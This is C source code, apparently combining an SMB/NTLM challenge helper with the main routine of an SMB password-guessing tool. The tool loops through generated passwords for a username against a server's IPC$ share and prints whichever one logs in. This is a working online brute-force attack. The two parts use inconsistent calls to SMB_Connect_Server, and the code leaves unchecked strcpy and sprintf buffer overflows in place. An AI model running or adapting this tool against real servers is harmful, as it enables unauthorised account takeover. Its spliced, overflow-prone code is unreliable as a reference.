/* returns 0 on success, > 0 on failure */
static int
init_challenge(char *domain, char *domain_controller)
{
int smberr;
if (handle != NULL) {
return 0;
}
debug("Connecting to server %s domain %s\n", domain_controller, domain);
handle = SMB_Connect_Server(NULL, domain_controller, domain);
smberr = SMB_Get_Last_Error();
SMB_Get_Error_Msg(smberr, errstr, 1000);
if (handle == NULL) { /* couldn't connect */
debug("Couldn't connect to SMB Server. Error:%s\n", errstr);
return 1;
}
if (SMB_Negotiate(handle, SMB_Prots) < 0) { /* An error */
debug("Error negotiating protocol with SMB Server\n");
SMB_Discon(handle, 0);
handle = NULL;
return 2;
}
if (handle->Security == 0) { /* share-level security, unuseable */
debug("SMB Server uses share-level security .. we need user security.\n");
SMB_Discon(handle, 0);
handle = NULL;
return 3;
}
memcpy(challenge, handle->Encrypt_Key, NONCE_LEN);
SMBencrypt((unsigned char *)"",challenge,lmencoded_empty_pass);
SMBNTencrypt((unsigned char *)"",challenge,ntencoded_empty_pass);
return 0;
}
main(int argc, char *argv[])
{
void *con, *tree;
extern char *optarg;
extern int optind;
int opt, error, SMB_Error, err_class, err_code, pwlen, tries = 0;
char server[80], service[80], service_name[160], password[80], username[80];
char old_password[80], err_string[1024];
server[0] = 0;
strncpy(service, "IPC$", sizeof(service) - 1);
service_name[0] = 0;
username[0] = 0;
password[0] = 0;
old_password[0] = 0;
while ((opt = getopt(argc, argv, "s:u:l:v")) != EOF) {
switch (opt) {
case 's':
strcpy(service, optarg);
break;
case 'u': /* Pick up the user name */
strncpy(username, optarg, sizeof(username) - 1);
break;
case 'l': /* pick up password len */
pwlen = atoi(optarg);
break;
case 'v': /* Verbose? */
verbose = TRUE;
break;
default:
usage();
exit(1);
break;
}
}
if (optind < argc) { /* Some more parameters, assume is the server */
strncpy(server, argv[optind], sizeof(server) - 1);
optind++;
} else {
strcpy(server, "nemesis");
}
if (verbose == TRUE) { /* Print out all we know */
fprintf(stderr, "Finding password for User: %s, on server: %s\n",
username, server);
fprintf(stderr, "with a pwlen = %i\n", pwlen);
}
SMB_Init(); /* Initialize things ... */
/* We connect to the server and negotiate */
con = SMB_Connect_Server(NULL, server);
if (con == NULL) { /* Error processing */
fprintf(stderr, "Unable to connect to server %s ...\n", server);
if (SMB_Get_Last_Error() == SMBlibE_Remote) {
SMB_Error = SMB_Get_Last_SMB_Err();
SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error),
SMBlib_Error_Code(SMB_Error),
err_string,
sizeof(err_string) - 1);
} else {
SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1);
}
printf(" %s\n", err_string);
exit(1);
}
/* We need to negotiate a protocol better than PC NetWork Program */
if (SMB_Negotiate(con, SMB_Prots) < 0) {
fprintf(stderr, "Unable to negotiate a protocol with server %s ...\n",
server);
if (SMB_Get_Last_Error() == SMBlibE_Remote) {
SMB_Error = SMB_Get_Last_SMB_Err();
SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error),
SMBlib_Error_Code(SMB_Error),
err_string,
sizeof(err_string) - 1);
} else {
SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1);
}
printf(" %s\n", err_string);
exit(1);
}
sprintf(service_name, "\\\\%s\\%s", server, service); /* Could blow up */
/* Now loop through all password possibilities ... */
memset(password, 0, sizeof(password));
while (next_password(password, pwlen) == TRUE) {
if ((tree = SMB_Logon_And_TCon(con,
NULL,
username,
password,
service_name, "?????")) == NULL) {
if (verbose == TRUE) { /* Lets hear about the error */
fprintf(stderr, "Unable to logon and tree connect to server %s ...\n",
server);
fprintf(stderr, "With username: %s, and password: %s\n",
username, print_password(password));
if (SMB_Get_Last_Error() == SMBlibE_Remote) {
SMB_Error = SMB_Get_Last_SMB_Err();
SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error),
SMBlib_Error_Code(SMB_Error),
err_string,
sizeof(err_string) - 1);
} else {
SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1);
}
printf(" %s\n", err_string);
}
} else { /* Password match */
fprintf(stderr, "Logged in with password:%s\n",
print_password(password));
/* Exit now ... */
exit(0);
}
}
fprintf(stderr, "Passwords exhausted.");
}
